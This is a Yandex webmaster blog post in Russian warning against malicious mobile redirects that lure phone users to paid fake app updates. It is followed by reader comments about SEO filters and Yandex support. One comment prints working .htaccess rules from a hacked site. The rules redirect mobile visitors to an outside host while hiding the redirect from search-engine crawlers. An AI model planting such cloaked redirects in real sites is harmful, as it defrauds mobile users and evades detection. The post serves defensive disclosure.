Блог Яндекса для вебмастеров

Вредоносные мобильные редиректы

Пост в архиве.

Всё больше людей пользуются мобильными устройствами и мобильным интернетом. Эта часть интернета стала привлекательной не только для вебмастеров, но и для злоумышленников.

 

Наша система обнаружения вредоносного кода выявила в мобильном интернете большое количество мобильных редиректов. Эти редиректы автоматически срабатывают, если пользователь зашел на сайт с мобильного телефона или планшета. Они перенаправляют посетителей на сайты с вредоносным или мошенническим ПО для мобильных устройств.

Яндекс считает, что подобные сайты с автоматическими редиректами (дорвеи) не представляют информационной ценности и не нужны в результатах поиска. Кроме того браузеры, использующие Safe Browsing API, и антивирусы предупреждают пользователя об опасности, если редирект ведет на зараженный сайт. В результате трафик на такие сайты уменьшается на несколько порядков.

Мы настоятельно не рекомендуем вебмастерам размещать на своих сайтах мобильные редиректы, а также вступать в партнёрские сети, которые предлагают «монетизировать» мобильный трафик за счёт размещения редиректов, например, на www.elitepay.ru.

 

Подробнее о мобильных редиректах

Мобильные редиректы работают следующим образом. Вебмастер, например, вступает в партнёрскую сеть и размещает на страницах сайта код, который срабатывает только при заходе на сайт с мобильного устройства и перенаправляет пользователя на сайт с вредоносным ПО. За каждый переход вебмастеру обещают начислять деньги.

Пользователь попадает на вредоносный сайт, и его перенаправляют на страницу с предложением установить какую-то программу. Например, обновить мобильный браузер Opera Mini. Для загрузки обновления сайт требует, чтобы пользователь отправил SMS за несколько десятков рублей, при том, что мобильный браузер распространяется вообще бесплатно. Если пользователь платит и устанавливает «обновлённую» программу, такие SMS дальше начинают отправляться автоматически, без согласия владельца телефона.

В зависимости от браузера, через который пришёл пользователь, сайты предлагают загрузить файлы с разными расширениями. Например, apk-файл для устройств на платформе Android, jar-файл для платформы J2ME. Кроме того, некоторые сайты перенаправляют пользователей iPhone, iPod и iPad на страницу установки специального дорогого ipa-приложения — сайт якобы можно просматривать только с помощью него. А на самом деле для просмотра подойдёт любой браузер, а сам сайт не содержит никакой полезной информации.

Как избавиться от редиректа на сайте

Если Яндекс обнаружил на вашем сайте код мобильного редиректа, вам придёт уведомление и рекомендации по его удалению. Обратите внимание: Яндекс никогда не попросит вас сообщить какие-либо пароли или заплатить за помощь.

Проверить, установлен ли на вашем сайте мобильный редирект, можно и самостоятельно. Просто попробуйте зайти на него с различных мобильных устройств, подключенных к интернету.

Если на вашем сайте есть редирект, но вы не размещали его самостоятельно, то, скорее всего, сайт был взломан. В этом случае вам поможет эта статья.

Команда безопасного поиска Яндекса


 


78 комментариев

элитпэй негодует!

могли бы хоть ссылочку поставить...

Я на одном сайте смотрю фильмы он лайн с компьютера . И решила попробовать зайти на страницу с мобильного. Нажав на окно там где должен быть фильм , началась загружаться айсикью. Благо что я не запустила ее а заранее посмотрела вес . 5 килобайт . ((( 

Иван Краснояров
19 января 2016, 11:22

Сейчас мало кто пользуется мобильным интернетом - денег много уходит.

100 рублей в месяц полный безлимит в Самаре допустим. Не такие уж и большие деньги)

200 руб в мск анлим мтс/билайн.

Бред, если 100-300 руб для вас много, то да, много...

с той скоростью что дают за эти деньги это не интернет, а пронография и пользоваться им издеваться над собой

нормальное качество стоит от 9000 руб :)

На форумах партнерок развелось мобильных немерянно, так что вполне предсказуемый результат

http://sickboy.ru/mysli-vslux/elite-pay-govnopartnerka-pod-mobilnyjj-traffik-moya-recenziya-posle-dnya-raboty.html - А я про это давно писал! Вот нихрена же не верят... 

И че ты эту ссылку сюда кинул? в посте ты жалуешься на то, что они тебе мало выплачивали, а не на то, что они людей кидали

Сайты на которых обнаружен такой редирект исключаются из общей выдачи или только из мобильного поиска?

Да и спорно всё очень. Многие используют подобные редиректы для перенаправления мобильных пользователей на оптимизированный вариант сайта.
Разумеется, Яндекс отличает мобильные дорвеи от редиректов на версии сайтов, оптимизированные для просмотра на мобильных устройствах.
И вообще Яндекс - зеркало рунета или его цензор? ;)

уже давно к сожалению или к счастью цензор...

Лучше б с порнухой так воевали =)

Я логики понять не могу. Если к примеру СДЛ вступил в такую портнерку (ну или просто классный сайт (например предположу невероятное - Вести.ру)) то по логике Яши его значит надо под фильтр.

А то что сайты с порнухой кроме растления малолеток (типа ролики с названиями "сын ебет сестру и маму") заразу для компа всякую распространяют это нормально, так чтоли?

По мне нужно монетизаторы вап трафа оставить, а вот на порно сайты 100% бан наложить (знаю что многие со мной не согласяться, но я выссказался и это мое ИМХО)

Порно это искуство ))

Бороться нужно с ДП и вирусами, к остальному нужно относиться нейтрально. :)

 

Яндекс не цензор. Мы просто отвечаем на вопросы пользователей. Дорвеи не отвечают ни на какие вопросы пользователей, поэтому мы не включаем их в результаты поиска.

Александр, нам как рядовым пользователям и вебмастерам виднее. :))

Я не хочу сказать что данное нововедение плохо, если редиректы ведут на вирусы, этому нужно припятствовать, но именно вы (Яндекс) в данной ситуации являетесь как не крути, цензором. По сути дела бороться такими вопросами должны антивирусы, они за это деньги получают...

т.е баниться будут только дорвеи? А белые, качественные сайты, отправляющие мобильных пользователей на такие партнерки могут спать спокойно?

Белые качественные сайты подсовывающие людям вирусы должны спать спокойно?

Сайтов куева туча, если половину вредоностных забанить - вторая половина, которая не кидала пользователей на вирусы - получит вполне заслуженный траф! все честно!

 

Нормальные белые сайты не будут слать юзеров на ГС, особенно с вирусней и алярмами! Ссылка в тему: Web-монетизация мобильного трафика: выжимка всех соков с сайта.

Выводилась бы реклама и в моб.версиях и проблем бы небыло. (вроде слышал, что гугл партнерку для вап трафика какую-то делает или сделал.)

А так к примеру у меня 10000к посещалка из них 1к с телефона.Естесственно, что соблазн пытаться че-то с этим трафом делать велик.

ИМХО нужна нормальная партнерка для вап.трафа. чтоб и юзер поподал туда, куда надо и копеечку оставлял.

А кстати, есть ли рич-партнерки для мобильных версий?

 

Так я чет не понял - вы выкидывает сайты только из мобильного поиска или "пинаете по полной"?

Какие Дорвеи если не мобильный юзер видет нормальный сайт с нормальным контентом?

 

хорошие дорвеи отвечают на вопросы пользователей :D

А если редирект ведет на поддомен сайта, который представляет из себя мобильную версию?

О, а меня сегодня как раз товарищ из elitepay.ru агитировал :-)

Недавно получил от elitepay письмо с предложением участвовать в мобильной ПП. Хорошо что отказался!

Здраствуйте, у меня к вам такой вопрос. В общем есть сайт - крупный портал мобильной тематики. Допустим юзер приходит с поисковика на страницу с каким-нибудь приложением, читает обзор оного, смотрит картинки и потом хочет скачать данное приложение на свой мобильный телефон. Постоянный (зарегистрированный) пользователь получает ссылку на скачивание файла, а если посетитель не зарегистрирован на сайте - ему отдаётся ссылка на скачивание приложения только после того, как он оплатит доступ к нему. О том, что за доступ к контенту нужно заплатить юзера уведомляют ДВАЖДЫ - первый раз на сайте (на странице с приложением), а второй раз уже в самом приложении. То бишь оплата идёт лишь после принятия пользовательского соглашения. Никаких редиректов при этом не используется. Я считаю, что это полностью законно и справедливо чисто по человечески - пользователь после оплаты получает полностью рабочий установщик приложения, а не пустышку. Хотелось бы увидеть (услышать/прочитать) ваше мнение. Спасибо. 

Это, батенька, будет АГС. Проверено и перепроверено. Хотя - я даже не в обиде на Яшу, ибо - нефти заработано было весьма много, даже - много больше, чем много.
ЗЫ. А вот про рабочий установщик - вы б б-га не гневили, не хорошо говорить неправду, ибо - мы то с вами знаем - что там за приложение то o_O 

Нет пока модули партнерок не трогают!

Константин Кононов
19 января 2016, 11:22

Ну вот и ответ! А я все думал у себя мобильный трафик монетизровать, да что-то удерживало!

спасибо вам большое! банить все эти сайты! обманывают людей редерикт идет на скачивание несуществующих программ и прочее мошенничество. 

Чем бы дитя не тешилось, лишь бы не плакало...

Займитесь лучше поиском - Яндекс все же поисковик как никак.

А пока Яндекс ищет, Google находит.

Зашел как-то с мобильного телефона в интернет, выскочило окошко, типа срочно обновите оперу, ну я "обновил" себе оперу на 100 руб.

Кстати опрераторы отказались мне помочь чем либо в данной ситуации.

Вот статья о сути покупки и продажи мобильного трафика.

Надо срочно прикрывать эту лавочку. 

Мои операторы МТС и Мегафон по моей просьбе запретили все автоматическтие подписки на всех номерах

Яндекс ни с кем не борется, он как обычно тупо пиарится!

такие партнерки как WapConverter.ru и MoneySyst.ru продолжают и дальше успешно работать, сливая трафик на всякий хлам на подобии Оперы или прочей хрени

 

более того еще и в своих топиках обсуждают как обойти Яндекс чтобы тот не запалил

forum.searchengines.ru/showthread.php?t=679984&highlight=%D1%8F%D0%BD%D0%B4%D0%B5%D0%BA%D1%81&page=29

проверил один сайт с андроида, айфона и айпада грузится нормально, а когда заходишь с виндоузфон через интернет эксплорер появляется эта опера, что это может быть?

Олег Светлов
19 января 2016, 11:22

а если я установлю редирект для собственного сайта на поддомен своего сайта на котором стоит мобильная версия моего сайта?

Вальдемар Маяковцев
19 января 2016, 11:22

Мобильные редиректы не нужны. Такую ссылку можно было поставить :-) Сам недавно пару раз такой спам присылали на телефон, зашел с ПК — перенаправление на файл мидлета (Java) — сдал в арбуз хостера.

скажите, а куда писать. после того как редирект убрал, а то в яндексе до сих пор пишет страница под угрозой.. хотя уже почистил все

fotostrana-pitomec
19 января 2016, 11:22

в вебмастерской Яндекса

 Решение проблемы редиректа (вируса) Сам вымучался проблемой редиректа, а то Яндекс записал в недруги и красная лисица искоса смотрит.

Материал про редирект мобильный: скрипт обновление flash плеера

 

оттуда: 

Как ни странно, приведенный ниже вредоносный код на данный момент (23.08.2012) не замечает ни один сервис для определения вирусов на сайте, а также Яндекс.Вебмастер и инструменты Google для вебмастеров. 

 

Удалённый пользователь
19 января 2016, 11:22
Всё прекрасно,всё замечательно.Но здесь есть одно Но!Уважаемая команда безопасного поиска Яндекса.Вот вы сколько ни говорите про безопасности поиска,всё равно как раз через поисковик Яндекса в отличии от Google попадаешь на самые разнообразные мошеннические сайты со всевозможными редиректами.Я не знаю с чем это связано,но согласитесь слова нужно превращать в дело.

Может кому-то поможет!  Сайт попал в зараженные оказалось взломали файл .htaccess добавили редирект на http://pubmob.ru/:

RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    http://pubmob.ru/inc/?red   [L,R=302]

И у меня такое раз было, а еще был заражен файл php.ini - это уже в другой раз...

у меня сайт, на котором  уже 4 раза! якобы был обнаружен вредоносный код, сайт проверен, перепроверен, не взломан и т.д. после сообщения яшки о том, что у меня ВК, я прошу перепроверить еще раз, и каждый раз выясняется, что КОД НЕ ОБНАРУЖЕН....

Захожу на сайт с разных мобильников, с планшета, никуда не редиректит...

Несколько раз писал в слубу тех. подержки яндекса, но там  сидит дядя робот и ему похрену, что у тебя и как...

знай себе толдычит, алгоритм да алгоритм..

 

а мне ответили что в первый раз обнаружен мобильный редирект, но сейчас все чисто.
через некоторое время опять.
зашел с планшета выкинуло на обновление флэши на flash-ox.com
все перерыл - не пойму что редиректит. в панели хостинга - нету редиректов, в коде страничек тоже нету, htaccess "чистый"
эх
Владимир Ларин
19 января 2016, 11:22

У меня тоже что-то подобное. Сайт уже в .... Слетел с первых позиций в поиске по ключевым совам, трафик упал вдвое, в WOT с темно-зеленой со звездочкой слетел на желтую. А яндекс перепроверку не делает уже неделю после того, как я запросил.

Дважды Яндекс находил такие проблемы у меня - дважды был прав... Дважды проходилось раскапывать хитрые ридиректы. Плохо, что до окончания перепроверки сайт идет с "черной меткой" и для пользователей интернета с обычных PC...

Весьма неприятно было увидеть предупреждение, что мой сайт-кормилец, РПК Результат, представляет угрозу для всякого, кто решит заказать у нас вывеску! А ведь на нашем сайте нет никакой рекламы - бережём нервы своих заказчиков, делаем всё, чтобы они не отвлекались на несущественное. Оказалось, что недавно размещённый скрипт социальных кнопок, распространяемый сайтом "Одна кнопка" сыграл с нами такую шутку...Четыре дня Яндекс "резал" наших потенциальных заказчиков. Итог - недополучение прибыли, которые и без того никакие.... 

Удивляет вот что: почему тот же Яндекс не предупредил меня, что этот скрипт(а брал я его с официального сайта, а не у партнёра) может характеризоваться как потенциальная угроза...

Аналогично, скрипт с сайта odnaknopka.ru - оказался зловредом!!!

Реальное спасибо Яндексу.

Именно настойчивое предупреждение помогло найти джумла-модуль который перенаправлял на "ОБНОВЛЕНИЕ ФЛЭШ ПЛЭЙЕРА".

А я всё игнорировал. И при этом удивлялся и чего меня мой сайт перекидывает на обновление флэша. Ведь я в андроид установил к прошивке нормальный флэш...

 

А решил просто - C-Panel хостинга имеет антивирусный сканер. Вот он-то и показал, что загажено.

 Или пользуйтесь скриптом проверки

Ну, или допустим, поговорим про платные подписки. Допустим, с оперы заходишь на нормальный музыкальный сайт, допустим с билайновской симки, и тут тебя перенаправляют на какой то платный сайт для оформления подписки. Я стараюсь сидеть через вай-фай,а не через билайновский инет.

Все мобильные редиректы ведут к понижению сайта в выдаче, или есть белые и черные ?

Сячина Ольга
15 декабря 2016, 14:51
Мой сайт не так давно зафильтровали как дорвей. Самое интересное, что никаких редиректов и перенаправлений на нем нет и не было. Сайт молодой, от роду месяц. Уникальный контент, писался нормальным, грамотным копирайтером.


После долгой переписки с Платонами - получаю в конце концов ответ: 


"Здравствуйте, Ольга!
В скором времени Ваш сайт должен начать индексироваться, а затем его страницы смогут появиться в поиске. Скорее всего, это произойдет в течение двух недель.
Однако, после анализа Вашего сайта мы пришли к выводу, что он не соответствует нашему представлению о качественных сайтах, отраженному в наших рекомендациях https://yandex.ru/support/webmaster/yandex-indexing/webmaster-advice.xml .
На решение алгоритма могло повлиять множество факторов, таких как отсутствие оригинального и интересного контента, наличие списков поисковых запросов, использование SEO-ссылок, чрезмерное использование рекламы и другие.
Мы стараемся настраивать и улучшать алгоритмы поиска так, чтобы сайты, соответствующие этим рекомендациями, быстро и полно индексировались и находились на высоких позициях по релевантным запросам.
Если Вы будете развивать сайт для пользователей, размещать уникальную и полезную информацию и следовать нашим рекомендациям, то со временем его позиции в результатах поиска смогут улучшиться."


Короче говоря, теперь сайт не дорвей, дорвейный фильтр сняли. Но наложили сразу же другой - "Малополезный контент, спам, избыток рекламы"


Рекламы на сайте нет, малополезным контент назвать ну никак нельзя - каждая статья отвечает на конкретный вопрос пользователя, грамотно написана, уникальна.  Спамом не занимаюсь, максимум три раза ключ повторяется в статье. При этом статьи от 2000 до 5000 знаков, не маленькие. 


Фильтр не снимают уже месяц. За что - не могу понять. То оно, то другое...   
Ольга Полянская
29 июня 2017, 15:24
Сячина Ольга,
добрый день! Удалось узнать, в чем была причина?
Сячина Ольга,
Столкнулся с аналогичной ситуацией. Сначала дорвей, потом дорвейный сняли и наложили этот фильтр. Скажите, как вышли из данной ситуации?
Обновлено 9 октября 2017, 13:43
Елена Першина
Сотрудник Яндекса9 октября 2017, 16:51
begunokdisk,
Я, конечно, всей ситуации не знаю - тут по конкретным сайтам лучше у поддержки спрашивать. Но в общем случае тут так:


Купили домен с плохой историей (был дорвеем), не заполнив сайт хорошим контентом, отправили на исправление. Сайт перестал быть дорвеем (проверка пройдена, нарушение снято), но контента на нем нет (появляется оповещение о малополезном контенте).


Что делать? Наполнить сайт нормальным контентом и после этого отправлять на перепроверку. 
Елена Першина,
Дело в том, что на сайт было проставлено огромное количество ссылок с сайтов-дорвеев. Далее был наложен фильтр дорвей на мои сайты. При обращении в СП фильтр был заменен на "Малополезный контент, спам, избыток рекламы".  Поддержка не помогает и отвечает на все вопросы стандартно : "Рекомендуем Вам улучшать свой сайт..."
В один день ушло по такой схеме под фильтры 9 сайтов! Все с разным содержимым, разным качеством, разным возрастом!  Домены все без истории и как минимум год в моем распоряжении.
Обновлено 9 октября 2017, 21:03
И да, отметок в ЯВМ нет, отправить на перепроверку в автоматическом режиме тоже не могу. 
Елена Першина
Сотрудник Яндекса9 октября 2017, 21:17
begunokdisk,
Если сайт признан дорвеем - отметка есть. 
Елена Першина,
Отметку "дорвей" сняли. Нет отметки "Малополезный контент, спам, избыток рекламы". После снятия фильтра "Дорвей" никаких отметок сейчас нет. Судя по ЯВМ с сайтами все отлично. Про новый фильтр мне сообщили только в переписке со СП.
Обновлено 9 октября 2017, 21:25
Елена Першина
Сотрудник Яндекса9 октября 2017, 21:35
begunokdisk,
Про некачественный контент тоже сообщаем. Какой номер тикета у вас? 
Елена Першина,
17100321330124598, к примеру.
Елена Першина,
А вот такие сайты ссылаются на меня: ezsalon.ru, domenowikia.ru, intel-systems.ru и таких ссылок за последний месяц более 400.
На одном из сайтов вообще картина маслом: https://prnt.sc/gvbuvb
Евгений Кумарыч
4 октября 2017, 15:09
Ребята кто поможет что за байда  с индексацией? Редекты со старого домена удалены но ссылки индексируются вот так  https://s1.postimg.org/7xvkwbp173/Screenshot_1.png
Обновлено 4 октября 2017, 15:10
Елена Першина
Сотрудник Яндекса4 октября 2017, 20:16
Евгений Кумарыч,
в поддержку Яндекса можно с этим вопросом написать - в раздел индексирование. 
Евгений Кумарыч
4 октября 2017, 23:14
Елена Першина,
будьте добры как туда обратиться ссылочку можно? 
Елена Першина
Сотрудник Яндекса5 октября 2017, 13:33
Евгений Кумарыч,
Ссылка "Обратная связь" внизу страницы сервиса Янгдекс.Вебмастер, если вы за логином. 
Евгений Кумарыч
5 октября 2017, 13:45
Елена Першина,
В том то и дело там просто список частых вопросов , но нет формы, чтобы написать обращение вот скриншот http://images.vfl.ru/ii/1507200281/927a85ba/18868212.png
Обновлено 5 октября 2017, 13:45
Елена Першина
Сотрудник Яндекса5 октября 2017, 14:42
Евгений Кумарыч,
Если заданные там вопросы не помогают, открывается форма обратной связи. Сделано это так потому, что большинство вопросов вообще не требуют обращения в поддержку, а лишь чтения 203 абзацев текста. 
Елена Першина
Сотрудник Яндекса5 октября 2017, 14:42
Елена Першина,
То есть пройдите всю цепочку вопросов.